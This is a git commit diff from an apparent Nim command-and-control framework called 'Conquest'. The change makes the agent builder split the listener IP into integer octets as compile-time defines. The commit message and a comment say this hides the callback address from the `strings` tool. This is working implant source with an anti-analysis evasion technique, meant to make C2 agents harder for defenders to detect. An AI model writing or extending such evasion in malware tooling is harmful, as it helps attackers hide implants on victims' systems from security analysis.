Hide hardcoded IP address from agent binary by splitting it up into integer octets

2025-06-02 21:37:58 +02:00
parent ac1bc22b93
commit b25d09e282
4 changed files with 26 additions and 6 deletions
--- a/server/agent/agent.nim
+++ b/server/agent/agent.nim
@@ -121,13 +121,19 @@ proc agentBuild*(cq: Conquest, listener, sleep, payload: string) =
    let listener = cq.listeners[listener.toUpperAscii] 

    # Create/overwrite nim.cfg file to set agent configuration 
-    let agentConfigFile = fmt"../agents/{payload}/nim.cfg"    
+    let agentConfigFile = fmt"../agents/{payload}/nim.cfg"   
+
+    # Parse IP Address and store as compile-time integer to hide hardcoded-strings in binary from `strings` command
+    let (first, second, third, fourth) = parseOctets(listener.address)

    # The following shows the format of the agent configuration file that defines compile-time variables 
    let config = fmt"""
    # Agent configuration 
    -d:ListenerUuid="{listener.name}"
-    -d:ListenerIp="{listener.address}"
+    -d:Octet1="{first}"
+    -d:Octet2="{second}"
+    -d:Octet3="{third}"
+    -d:Octet4="{fourth}"
    -d:ListenerPort={listener.port}
    -d:SleepDelay={sleep}
    """.replace("    ", "")
--- a/server/utils.nim
+++ b/server/utils.nim
@@ -3,6 +3,11 @@ import std/wordwrap

 import ./[types]

+proc parseOctets*(ip: string): tuple[first, second, third, fourth: int] = 
+    # TODO: Verify that address is in correct, expected format
+    let octets = ip.split('.')
+    return (parseInt(octets[0]), parseInt(octets[1]), parseInt(octets[2]), parseInt(octets[3]))
+
 proc validatePort*(portStr: string): bool = 
    try:
        let port: int = portStr.parseInt